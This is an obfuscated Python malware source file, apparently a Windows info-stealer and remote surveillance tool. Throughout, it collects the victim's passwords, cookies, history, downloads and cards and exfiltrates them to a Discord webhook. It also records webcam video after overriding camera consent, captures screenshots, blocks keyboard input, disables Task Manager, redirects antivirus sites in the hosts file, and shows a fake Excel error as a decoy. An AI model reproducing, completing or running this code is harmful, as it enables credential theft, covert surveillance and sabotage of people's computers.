            if QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS not in EMMKHTOVPYVCXUSXOKKYCOPYJAXVUCVUKAMLIPACPVOKMNMBERHLVCOOHWSYWVJZJKCUNQQDUPQSCEZMRUKS:
                EMMKHTOVPYVCXUSXOKKYCOPYJAXVUCVUKAMLIPACPVOKMNMBERHLVCOOHWSYWVJZJKCUNQQDUPQSCEZMRUKS.append(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS)
            
    if not QNZJZLKYPRHABOTORVKSQLPIJQIWWWTTFSULPFCSCPTVITMNYZNOXLNXWZOCFHPXIEQCUHIGOJHHOVNOCWU:
        QNZJZLKYPRHABOTORVKSQLPIJQIWWWTTFSULPFCSCPTVITMNYZNOXLNXWZOCFHPXIEQCUHIGOJHHOVNOCWU.append("No passwords was saved on the victim's computer")
    if not KMNKMTMXDIJXDZNNWDNHHYYELHKVBSPAHOVSNKVYPEQZKDSCZKCTOAVNJ:
        KMNKMTMXDIJXDZNNWDNHHYYELHKVBSPAHOVSNKVYPEQZKDSCZKCTOAVNJ.append("No cookies was saved on the victim's computer")
    if not QWZPQRAUHNYURDUVCOYHETJNVGSQWLEBRMDNONJSCISHMEVVHJCTNLONISNPGFS:
        QWZPQRAUHNYURDUVCOYHETJNVGSQWLEBRMDNONJSCISHMEVVHJCTNLONISNPGFS.append("No history was saved on the victim's computer")
    if not NBYAPYMWIGBNOPXDVEXHGBZZYZYQSCJTXFINKVHXEYVKAGGJVCNEGZBKDWKAHD:
        NBYAPYMWIGBNOPXDVEXHGBZZYZYQSCJTXFINKVHXEYVKAGGJVCNEGZBKDWKAHD.append("No downloads was saved on the victim's computer")
    if not ZSHFZAUIFSZNJZSVDWUGRPXQVXNBZMPOCRKMTGGNZVGAJINOZUOMYCMZLM:
        ZSHFZAUIFSZNJZSVDWUGRPXQVXNBZMPOCRKMTGGNZVGAJINOZUOMYCMZLM.append("No card was saved on the victim's computer")

    zip_in_memory = FTMDVPBMROASWNXUKXEYJUJSFXGXAJPAKKSSBNVLIOZNQDQRBDHYZOXYDOSTTXWGNZDVGQHREZMVGVGPAOHVUFG(DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM)
    KWLMQQBLQLMWXCIQLPBBXYKYYQZBZZHVTUERBFHYBQHICTFTAZDXQNOF(DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM, zip_in_memory)

def ZAAOJORKXOJAJAIFYYWROKMDVARASKISUOINBUNYLKJDLJOHDEUQNWRBYVSN():
    import os
    import cv2
    from discord import SyncWebhook, Embed, File
    from datetime import datetime
    import winreg
    from datetime import datetime

    try:
        try:
            key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore" + r'\webcam', 0, winreg.KEY_SET_VALUE)
            winreg.SetValueEx(key, 'Value', 0, winreg.REG_SZ, 'Allow')
            winreg.CloseKey(key)
        except: pass
        HLVVZSMONUAXWWDKYDBXZOAZDQZTFAEUWQHAIDCEAVQPWPBIJYEHUX_file_capture = f"CameraCapture_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.avi"

        def C4ptur3(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX_file_capture):
            YSYLCWEJNJLEOMINPEFLIZTZQKBGMATTCVFCVPDPRRXOMLSIYLWSGUTJOQXVZKKEWHCNYEJGVNLKXJYXVEYRLDUIZOWWE_capture = 15
            PPUYPEJJTZIIFCAOFEVCUVPTGVRGFMBNAKPLRUFLEVLYCDCDPOHORZCNIUIGNHZONPTCAYUYQFIAEAIAMFGLRJPDJTZVRDLMOPUR = cv2.VideoCapture(0)

            if not PPUYPEJJTZIIFCAOFEVCUVPTGVRGFMBNAKPLRUFLEVLYCDCDPOHORZCNIUIGNHZONPTCAYUYQFIAEAIAMFGLRJPDJTZVRDLMOPUR.isOpened():
                PDPGVMCNFOVQVIRLHSRUWXMELURRPSRPYFZEOULPGYMVXWXDTLYLYDYEHYHBZYOHZJIOVEEAUJZLQSDDOTNUENAM()
                GIYVELZYNVLMOQZSTMUKYMUTDUMLQJTSLNOVPQDAQGQRCYSADVLXHDWXTX(
                    NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC, 
                    title=f'Camera Capture {DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM} "{OBAHGDBIIZSMTYVVNQSIRZAGLEFNRUEQTPGHWDDVQYYFKORYMJOEGAIFEWTIWFQQVAYWRTGYFCSWRHJWZOMEUWUXXOZWRPWB}":', 
                    description=f"No cameras found."
                )
                status = "exit"
                return status
            
            SQCQJRYDDKXPRWRSLVFZDTPUOYIUUUXIQHGDKLHMYBYGBOHTYUMYRIFQQNONXUYSUYEVM = cv2.VideoWriter_fourcc(*'XVID')
            ZHQVXEQEJETIIOAPZATYVXUYTTXYYZILTPWJKZAMDZEGXPGIOWHYSCVMHJDMFNSZBEDNVBTGKZGPGILHK = cv2.VideoWriter(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX_file_capture, SQCQJRYDDKXPRWRSLVFZDTPUOYIUUUXIQHGDKLHMYBYGBOHTYUMYRIFQQNONXUYSUYEVM, 20.0, (640, 480))
            YSYLCWEJNJLEOMINPEFLIZTZQKBGMATTCVFCVPDPRRXOMLSIYLWSGUTJOQXVZKKEWHCNYEJGVNLKXJYXVEYRLDUIZOWWE_start = datetime.now()
            while (datetime.now() - YSYLCWEJNJLEOMINPEFLIZTZQKBGMATTCVFCVPDPRRXOMLSIYLWSGUTJOQXVZKKEWHCNYEJGVNLKXJYXVEYRLDUIZOWWE_start).seconds < YSYLCWEJNJLEOMINPEFLIZTZQKBGMATTCVFCVPDPRRXOMLSIYLWSGUTJOQXVZKKEWHCNYEJGVNLKXJYXVEYRLDUIZOWWE_capture:
                v4r_ret, v4r_frame = PPUYPEJJTZIIFCAOFEVCUVPTGVRGFMBNAKPLRUFLEVLYCDCDPOHORZCNIUIGNHZONPTCAYUYQFIAEAIAMFGLRJPDJTZVRDLMOPUR.read()
                if not v4r_ret:
                    break
                ZHQVXEQEJETIIOAPZATYVXUYTTXYYZILTPWJKZAMDZEGXPGIOWHYSCVMHJDMFNSZBEDNVBTGKZGPGILHK.write(v4r_frame)

            PPUYPEJJTZIIFCAOFEVCUVPTGVRGFMBNAKPLRUFLEVLYCDCDPOHORZCNIUIGNHZONPTCAYUYQFIAEAIAMFGLRJPDJTZVRDLMOPUR.release()
            ZHQVXEQEJETIIOAPZATYVXUYTTXYYZILTPWJKZAMDZEGXPGIOWHYSCVMHJDMFNSZBEDNVBTGKZGPGILHK.release()
            status = None
            
            return status

        try:
            EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX_file_capture = os.path.join(BUXNRMAXQNGMXDEUXOSSVFDWHAKIOKSNAQXQWASCIVLWERIMTJQZCUSGAYFARQ, 'Documents', HLVVZSMONUAXWWDKYDBXZOAZDQZTFAEUWQHAIDCEAVQPWPBIJYEHUX_file_capture)
            status = C4ptur3(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX_file_capture)
        except:
            EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX_file_capture = HLVVZSMONUAXWWDKYDBXZOAZDQZTFAEUWQHAIDCEAVQPWPBIJYEHUX_file_capture
            status = C4ptur3(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX_file_capture)
        
        if status == "exit":
            return

        NZAJYUSMCXRXNXNXEPGKTUJDSKEHQNPJBFQMUTBUYLQEREAPNCEAZQMKVVJYPUJBLKOLTNZJK = Embed(title=f"Camera Capture {MWJPQONMDCWWSTSYPOTJPVUFMBPBJWRWZTRWUZVVMTUSUGCHZGOUBCBAAMISRONFYIYOLJXRJRQAZIEZLIECVRWOYD}:", color=DTTKKKCYSVPJWFZWSMVDSHBOCYYDWPXYKJLOEMZITPMEDXUIABQDQJAMCAJJTWWYCGOMWNGNAAGKYJJERTCBFJZSEDQUDSNZQH, description=f"```└── 📷 - {HLVVZSMONUAXWWDKYDBXZOAZDQZTFAEUWQHAIDCEAVQPWPBIJYEHUX_file_capture}```")
        NZAJYUSMCXRXNXNXEPGKTUJDSKEHQNPJBFQMUTBUYLQEREAPNCEAZQMKVVJYPUJBLKOLTNZJK.set_footer(text=CTYDDRKFZDARVGPASDBJAPLJRUHHJJLJWOROLAERPRXWPAMLKXMNBHIKYFMREUOPOSIEMV, icon_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR)

        LSDSXBVVQABFIKQQUROBYVROAYRIFOSMEWFSEPVWRCILIPSKYMVYLD = SyncWebhook.from_url(NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC)
        with open(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX_file_capture, "rb") as f:
            LSDSXBVVQABFIKQQUROBYVROAYRIFOSMEWFSEPVWRCILIPSKYMVYLD.send(
                embed=NZAJYUSMCXRXNXNXEPGKTUJDSKEHQNPJBFQMUTBUYLQEREAPNCEAZQMKVVJYPUJBLKOLTNZJK,
                file=File(f, filename=HLVVZSMONUAXWWDKYDBXZOAZDQZTFAEUWQHAIDCEAVQPWPBIJYEHUX_file_capture),
                username=QXYCEYRPXWXWGTCQFAGKQNDQWVQARSQYWBPRBZYQLDVIQEFWIOJLGRBELHZIIKDZQX,
                avatar_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR
            )
            
        if os.path.exists(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX_file_capture):
            os.remove(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX_file_capture)
    except Exception as e:
        GIYVELZYNVLMOQZSTMUKYMUTDUMLQJTSLNOVPQDAQGQRCYSADVLXHDWXTX(
            NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC, 
            title=f'Camera Capture {MWJPQONMDCWWSTSYPOTJPVUFMBPBJWRWZTRWUZVVMTUSUGCHZGOUBCBAAMISRONFYIYOLJXRJRQAZIEZLIECVRWOYD}:', 
            description=f"""Unable to make a recording:
            ```{e}```"""
        )

def OEZLKROHSHZLJYNEYBKUEQCLGVMMKLNMFOUCYNCGTCMEVKJXCMTVLPSZZUFKGUQRMJHYZBUUMGTTAXWQRVBEROZUJSSGSREXQDGQ():
    import subprocess
    import time
    try:
        subprocess.Popen(["control", "userpasswords2"])
        time.sleep(2)
    except:
        pass

def QNWFHNUBANSFSFDVBCPBSXODHPUNFGAQVMMEWASREAVULXQUDJLPCYOYMBSLAYQCKXLLOOEFNPYNTRWALCSXWZXZHMEGDHUZ():
    import io
    from PIL import ImageGrab
    from discord import SyncWebhook, Embed, File
    
    try:
        def C4ptur3():
            URVXWVXHWZLSHYCYOBZLXJVYJPHQMIQJNXJIHOOGHFUADLRHWMJPASMOOLPCSIFGDEZDYPORVCEEDSMMOGXFULFRWTIK = ImageGrab.grab(
                bbox=None,
                include_layered_windows=False,
                all_screens=True,
                xdisplay=None
            )
            URVXWVXHWZLSHYCYOBZLXJVYJPHQMIQJNXJIHOOGHFUADLRHWMJPASMOOLPCSIFGDEZDYPORVCEEDSMMOGXFULFRWTIK_bytes = io.BytesIO()
            URVXWVXHWZLSHYCYOBZLXJVYJPHQMIQJNXJIHOOGHFUADLRHWMJPASMOOLPCSIFGDEZDYPORVCEEDSMMOGXFULFRWTIK.save(URVXWVXHWZLSHYCYOBZLXJVYJPHQMIQJNXJIHOOGHFUADLRHWMJPASMOOLPCSIFGDEZDYPORVCEEDSMMOGXFULFRWTIK_bytes, format='PNG')
            URVXWVXHWZLSHYCYOBZLXJVYJPHQMIQJNXJIHOOGHFUADLRHWMJPASMOOLPCSIFGDEZDYPORVCEEDSMMOGXFULFRWTIK_bytes.seek(0)
            return URVXWVXHWZLSHYCYOBZLXJVYJPHQMIQJNXJIHOOGHFUADLRHWMJPASMOOLPCSIFGDEZDYPORVCEEDSMMOGXFULFRWTIK_bytes
        
        URVXWVXHWZLSHYCYOBZLXJVYJPHQMIQJNXJIHOOGHFUADLRHWMJPASMOOLPCSIFGDEZDYPORVCEEDSMMOGXFULFRWTIK_bytes = C4ptur3()

        NZAJYUSMCXRXNXNXEPGKTUJDSKEHQNPJBFQMUTBUYLQEREAPNCEAZQMKVVJYPUJBLKOLTNZJK = Embed(title=f"Screenshot {MWJPQONMDCWWSTSYPOTJPVUFMBPBJWRWZTRWUZVVMTUSUGCHZGOUBCBAAMISRONFYIYOLJXRJRQAZIEZLIECVRWOYD}:", color=DTTKKKCYSVPJWFZWSMVDSHBOCYYDWPXYKJLOEMZITPMEDXUIABQDQJAMCAJJTWWYCGOMWNGNAAGKYJJERTCBFJZSEDQUDSNZQH)
        NZAJYUSMCXRXNXNXEPGKTUJDSKEHQNPJBFQMUTBUYLQEREAPNCEAZQMKVVJYPUJBLKOLTNZJK.set_image(url="attachment://screenshot.png")
        NZAJYUSMCXRXNXNXEPGKTUJDSKEHQNPJBFQMUTBUYLQEREAPNCEAZQMKVVJYPUJBLKOLTNZJK.set_footer(text=CTYDDRKFZDARVGPASDBJAPLJRUHHJJLJWOROLAERPRXWPAMLKXMNBHIKYFMREUOPOSIEMV, icon_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR)
        LSDSXBVVQABFIKQQUROBYVROAYRIFOSMEWFSEPVWRCILIPSKYMVYLD = SyncWebhook.from_url(NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC)
        LSDSXBVVQABFIKQQUROBYVROAYRIFOSMEWFSEPVWRCILIPSKYMVYLD.send(
            embed=NZAJYUSMCXRXNXNXEPGKTUJDSKEHQNPJBFQMUTBUYLQEREAPNCEAZQMKVVJYPUJBLKOLTNZJK,
            file=File(URVXWVXHWZLSHYCYOBZLXJVYJPHQMIQJNXJIHOOGHFUADLRHWMJPASMOOLPCSIFGDEZDYPORVCEEDSMMOGXFULFRWTIK_bytes, filename="screenshot.png"),
            username=QXYCEYRPXWXWGTCQFAGKQNDQWVQARSQYWBPRBZYQLDVIQEFWIOJLGRBELHZIIKDZQX,
            avatar_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR
        )
    except Exception as e:
        GIYVELZYNVLMOQZSTMUKYMUTDUMLQJTSLNOVPQDAQGQRCYSADVLXHDWXTX(
            NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC, 
            title=f'Screenshot {MWJPQONMDCWWSTSYPOTJPVUFMBPBJWRWZTRWUZVVMTUSUGCHZGOUBCBAAMISRONFYIYOLJXRJRQAZIEZLIECVRWOYD}:', 
            description=f"""**Unable to take a screenshot:**
            ```{e}```"""
        )

def HAPCHKXCDVFGQLLRCDWOVGLYRRDFCVUTXASOSSSQOEDZJPONFOLHXT():
    import keyboard
    k3y = [
        "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",
        "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z",
        "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "ù",
        "`", "+", "-", "=", "*", "[", "]", "\\", ";", "'", ",", ".", "/", 
        "space", "enter", "esc", "tab", "backspace", "delete", "insert",
        "up", "down", "left", "right", "equal", "home", "end", "page up", "page down",
        "caps lock", "num lock", "scroll lock", "shift", "ctrl", "cmd", "win",
        "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "f10", "f11", "f12",
        "backslash", "semicolon", "comma", "period", "slash",
        "volume up", "volume down", "volume mute",
        "app", "sleep", "print screen", "pause",
    ]
    for k3y_b10ck in k3y:
        try: keyboard.block_key(k3y_b10ck)
        except: pass

def FNFVRTPXAXBLTFMVJIZFVZALYQTHKLSLQZPFWNVAUOHDMLAMSGFAOQ():
    import keyboard
    k3y = [
        "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",
        "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z",
        "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "ù",
        "`", "+", "-", "=", "*", "[", "]", "\\", ";", "'", ",", ".", "/", 
        "space", "enter", "esc", "tab", "backspace", "delete", "insert",
        "up", "down", "left", "right", "equal", "home", "end", "page up", "page down",
        "caps lock", "num lock", "scroll lock", "shift", "ctrl", "cmd", "win",
        "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "f10", "f11", "f12",
        "backslash", "semicolon", "comma", "period", "slash",
        "volume up", "volume down", "volume mute",
        "app", "sleep", "print screen", "pause",
    ]
    for k3y_b10ck in k3y:
        try: keyboard.unblock_key(k3y_b10ck)
        except: pass

def RLRQTWNYLANPRUMROWBMPICZHCKDFMPDMDQXTDIFEKYNFMEMYIFHWUZYKVXHGTPCSIFO():
    import pyautogui
    pyautogui.FAILSAFE = False
    width, height = pyautogui.size()
    pyautogui.moveTo(width + 100, height + 100)

def DFZYMLFZTBINISMBCIVPXSEFPRQASPMYRSWATNEPRLBJRTYNHC():
    import psutil
    import subprocess
    import os

    "Perm Admin Required"
    for proc in psutil.process_iter(['pid', 'name']):
        if proc.info['name'] == 'Taskmgr.exe':
            proc.terminate()
            break
    subprocess.run("reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

def OPUNKXFSATYAAEWGTUSUTUZGSRXTKFMUEONYTUDXXEHOJUDGDXLCPZSWUBZEWMSABIDVJGJWSVMMFSYKAPATJELR():
    import os

    "Perm Admin Required"
    try:
        def OONUTWARXMBALMSAQTSHVEMNYPUVCKLFBWOEEDILYZPNGIAKFPFPWLHLLCVRBGKPQCVPIHAQJSUUZPACIURVPSXBVZHTPYUNKNW(HUUNDRTZAHTRCHLFUDQBDYHVEEKHJTNWOHYSDELXZNFEEEJRQHGALWRW):
            DZQFUEQURCVUUNWMKVSKQSCTWVPQRTJRTPADQAWDNKSSDOOVMXMMLMFDCZNZEJUURDICZGAGOLLFIVOFPGHWXVENCFZMYGKRSYXS = os.path.join(os.environ["WINDIR"], "System32", "drivers", "etc", "hosts")
            if not os.path.exists(DZQFUEQURCVUUNWMKVSKQSCTWVPQRTJRTPADQAWDNKSSDOOVMXMMLMFDCZNZEJUURDICZGAGOLLFIVOFPGHWXVENCFZMYGKRSYXS):
                DZQFUEQURCVUUNWMKVSKQSCTWVPQRTJRTPADQAWDNKSSDOOVMXMMLMFDCZNZEJUURDICZGAGOLLFIVOFPGHWXVENCFZMYGKRSYXS = os.path.join("C:", "Windows", "System32", "drivers", "etc", "hosts")

            ORFZTXAFNQEUPTHCUNBFVSMNCZPLWAGGAMEFINDPLIKVLZNPWRSOWLNLHHCVMDZZKCKATCNPHSJZRDNJA = "127.0.0.1"
            with open(DZQFUEQURCVUUNWMKVSKQSCTWVPQRTJRTPADQAWDNKSSDOOVMXMMLMFDCZNZEJUURDICZGAGOLLFIVOFPGHWXVENCFZMYGKRSYXS, "a") as v4r_file:
                v4r_file.write("\n" + ORFZTXAFNQEUPTHCUNBFVSMNCZPLWAGGAMEFINDPLIKVLZNPWRSOWLNLHHCVMDZZKCKATCNPHSJZRDNJA + " " + HUUNDRTZAHTRCHLFUDQBDYHVEEKHJTNWOHYSDELXZNFEEEJRQHGALWRW)
        
        XXPJHRGBVACTZSRVWJQTMUHBIFOTLESMCPOOPOKSAOROIBXBUKALPXPTTKSKHQOVPLEB = [
            'virustotal.com', 
            'www.virustotal.com',
            'www.virustotal.com/gui/home/upload',
            'avast.com', 
            'totalav.com', 
            'scanguard.com', 
            'totaladblock.com', 
            'pcprotect.com', 
            'mcafee.com', 
            'bitdefender.com', 
            'us.norton.com', 
            'avg.com', 
            'malwarebytes.com', 
            'pandasecurity.com', 
            'avira.com', 
            'norton.com', 
            'eset.com', 
            'zillya.com', 
            'kaspersky.com', 
            'usa.kaspersky.com', 
            'sophos.com', 
            'home.sophos.com', 
            'adaware.com', 
            'bullguard.com', 
            'clamav.net', 
            'drweb.com', 
            'emsisoft.com', 
            'f-secure.com', 
            'zonealarm.com', 
            'trendmicro.com', 
            'ccleaner.com'
        ]

        for v4r_w3b51t3_t0_8l0ck in XXPJHRGBVACTZSRVWJQTMUHBIFOTLESMCPOOPOKSAOROIBXBUKALPXPTTKSKHQOVPLEB:
            OONUTWARXMBALMSAQTSHVEMNYPUVCKLFBWOEEDILYZPNGIAKFPFPWLHLLCVRBGKPQCVPIHAQJSUUZPACIURVPSXBVZHTPYUNKNW(v4r_w3b51t3_t0_8l0ck)
    except:
        pass

def YESBBNRAIRONTMBGZVWRBGUYMSIPMJBEHYXZMZXGFQAICLFRRARBZLWBQQUWV():
    import tkinter as tk
    from tkinter import messagebox
    root = tk.Tk()
    root.withdraw()
    messagebox.showerror("Microsoft Excel", "The file is corrupt and cannot be opened.")

def TZLJDNYJKGNMPHYLMFMYDCEJVDAQEPLSYBZNJNVRKNFAPIJHSVDTFCMDLYGEHMXJZKXIQY():
    import keyboard
    while True:
        try:
            RLRQTWNYLANPRUMROWBMPICZHCKDFMPDMDQXTDIFEKYNFMEMYIFHWUZYKVXHGTPCSIFO()
            STOGCAQUEJCRHUKZCYLWSMLKVKEATVWNOATMYTNLFSEQSGLFCBWPYTBWXFLBMKUDRVGJAGPFFBXK()
            LBIHJVKPNLVSDANZMHWGDETHQIOCBIUZLMMJBZBLXVCZEMGUTGRWITEBBSCBENUIJCXNTVPYGV()
            if keyboard.is_pressed('alt') and keyboard.is_pressed('alt gr'):
                Unb10ck_K3y()
                break
        except:
            pass

try: requests.post(NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': QXYCEYRPXWXWGTCQFAGKQNDQWVQARSQYWBPRBZYQLDVIQEFWIOJLGRBELHZIIKDZQX, 'avatar_url': PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR,})
except: pass
try: threading.Thread(target=HAPCHKXCDVFGQLLRCDWOVGLYRRDFCVUTXASOSSSQOEDZJPONFOLHXT).start()
except: pass
try: threading.Thread(target=DFZYMLFZTBINISMBCIVPXSEFPRQASPMYRSWATNEPRLBJRTYNHC).start()
except: pass
try: threading.Thread(target=OPUNKXFSATYAAEWGTUSUTUZGSRXTKFMUEONYTUDXXEHOJUDGDXLCPZSWUBZEWMSABIDVJGJWSVMMFSYKAPATJELR).start()
except: pass
try: threading.Thread(target=UUCSHAYHUBDMGZYZTYCTVFULDQOEOTTAUWJWBRCKFYHBVSFSHTGSSQPDJN).start()
except: pass
try: YGNIIVHXIKAHGBPPCFATGOCGGNPFTPJOGWKEUYIVRYBDRUDDTOTRTIBCTK()
except: pass
try: TWEGULJAMWQLRCMXRIXDGIQMAMPNZTZWIKPATZQLBBWQFZNDNSLYAGIPNQFFNQUEJ()
except: pass
try: NHKEFBNFRCTKOUABQDJUTZMTNPQJUYBXJFJVEACIVLRWYOUBVPHCJUESNYMHPPM()
except: pass
try: IHYFFIHZNDERKVLGMPIKQEMLVPLXJHYADLYEYMPFLYOBEGNUVWXVSEEIDOGSKYFAMEXBWWGXOWIQNTXGVODLJYLOXSRZOWBYUSJ()
except: pass
try: QWUQXWQSEVQKIEZTUZAVGULLTJOHSYCMRDDKQILCBXOKGKBBZYDTJRITGHOIETEPYLNHFQOQZXBBK()
except: pass
try: ZAAOJORKXOJAJAIFYYWROKMDVARASKISUOINBUNYLKJDLJOHDEUQNWRBYVSN()
except: pass
try: OEZLKROHSHZLJYNEYBKUEQCLGVMMKLNMFOUCYNCGTCMEVKJXCMTVLPSZZUFKGUQRMJHYZBUUMGTTAXWQRVBEROZUJSSGSREXQDGQ()
except: pass
try: QNWFHNUBANSFSFDVBCPBSXODHPUNFGAQVMMEWASREAVULXQUDJLPCYOYMBSLAYQCKXLLOOEFNPYNTRWALCSXWZXZHMEGDHUZ()
except: pass
try: requests.post(NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC, json={'content': f'****╚══════════════════{OBAHGDBIIZSMTYVVNQSIRZAGLEFNRUEQTPGHWDDVQYYFKORYMJOEGAIFEWTIWFQQVAYWRTGYFCSWRHJWZOMEUWUXXOZWRPWB}══════════════════╝****', 'username': QXYCEYRPXWXWGTCQFAGKQNDQWVQARSQYWBPRBZYQLDVIQEFWIOJLGRBELHZIIKDZQX, 'avatar_url': PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR})
except: pass
try: threading.Thread(target=RZCFWZRSWTPMKBMFNTGEPZHZPZLOLLRUZMDPFFOMRBOGWKVPJIOFYHQGQTLGKIOAQRTZ).start()
except: pass
try: threading.Thread(target=ASHWPAWVNIFYMUSGBKYNOUIFCFPFHTYPMCHJNQVDHCUOFLXGYENKVQQVXVQWOEQQNSRDIUWVXIKDSNCYKAIEXHWTSDRHFMLHVSN).start()
except: pass
try: threading.Thread(target=YESBBNRAIRONTMBGZVWRBGUYMSIPMJBEHYXZMZXGFQAICLFRRARBZLWBQQUWV).start()
except: pass
try: threading.Thread(target=PHTBJNKUAKFBMKDQXBVVUQTUMHGHOJAIQWFHDFEVVBEKWLTFKXXUEDOVVYSNSSAX).start()
except: pass
